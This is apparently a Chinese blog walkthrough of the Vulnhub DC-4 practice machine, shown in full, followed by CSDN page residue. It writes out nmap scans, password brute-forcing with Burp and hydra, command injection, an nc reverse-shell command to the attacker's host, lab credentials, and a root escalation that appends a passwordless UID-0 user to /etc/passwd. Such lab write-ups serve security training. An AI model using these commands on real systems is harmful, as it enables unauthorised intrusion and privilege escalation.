Vulnhub-DC-4 靶机复现完整过程

一、搭建环境

1.工具

kali:攻击机 IP地址:192.168.200.4
DC-4:靶机 IP地址:暂时未知

2.注意

这里搭建环境两台机器应该选用同类的网络连接方式:这里两台的连接方式为模式

二、信息收集

1.主机发现

找寻同网段下存活的主机(可以根据DC-4的MAC地址看扫描出来的IP地址)

arp-scan -l  #第一种方式

image.png

nmap -sP 192.168.200.0/24 -T4 # 第二种方式

image.png

2.端口扫描

查看此主机开放了哪些可以利用的端口信息

nmap -sV -p-  192.168.200.9

image.png
3.后台目录扫描
image.png
4.网站指纹
通过以下两种方式可以准确知道网站的框架信息
①先登录网页,利用火狐插件查看
image.png
利用kali中的指纹识别命令whatweb扫描
image.png
网页提示信息是需要以admin用户进行登录的,那么现在只需要搞到密码就行
image.png

3.爆破密码

①暴力破解

image.png
得知password:happy
点击对应单选项,然后RUN发现是执行了每种ls指令,用BURP抓包
image.png
linux中的操作指令
image.png
试试其他经典指令,比如whoami、ip addr这种的
看不到明显的信息,倒是可以知道此指令是可以执行的(页面200)
image.png

还有一种就是在前端代码中寻找RUN时执行的对应指令,修改
尝试修改一下前端指令
image.png
一样的效果
image.png

三、反弹shell

1、首先在kali当中,使用nc进行端口监听

nc -lvvp 8899

image.png

2、修改命令 ,修改完后点击Go即可

nc 192.168.200.3 8899 -e /bin/bash 
#nc命令使用的是kali渗透机的ip地址,端口号需要和你上方nc监听端口一致

image.png

3、回到kali,这是低权限用户

image.png

4.使用python的交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

方便我们操作,避免因为退出而导致需要重新或许使用nc反弹shell
应该是三个人名:charles jim sam
经查看old-passowrd.bak是一个密码文件,只有jim下有东西,其他的两个目录下都为空
image.png
这是test.sh中的句子翻译,应该是暴力破解,而密码文件应该就在同级目录的那个文件当中
image.png

5、破解jim用户密码

,把old-passowrd.bak复制到kali中,使用hydra进行爆破,

hydra -l jim -P /home/kali/123.txt  ssh://192.168.200.9

需要等几分钟,得到密码
image.png
账号:jim
密码:jibr104

[22][ssh] host: 192.168.200.9   login: jim   password: jibril04

6、连接成功

image.png
image.png
进入 到邮件目录

cd /var/mail 里

image.png
结尾可以看到是charles发来的信息,登录密码:^xHhA&hvim0y,切换登陆看看su charles

一些目录被限制了权限,进行提升权限
image.png

权限提升

先用sudo -l看看自己有什么权限
teehee这个用户是不需要用密码登录的。
image.png

四、提权

添加一个无密码用户,并使用teehee执行写入 passwd中
echo 命令与 sudo 命令配合使用,可以实现向那些只有系统管理员才有权限操作的文件中写入信息命令解释程序(Shell)
添加一个用户,使用teehee执行写入到/etc/passwd中,加入到root权限组中**

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
参数解释
#如:admin:x:0:0::/home/admin:/bin/bash
#[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
"-a" 选项的作用等同于 ">>" 命令

image.png
无密码直接登录账号admin
image.png

大佬文章复现参考:https://blog.csdn.net/liver100day/article/details/117707129

  • 35
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值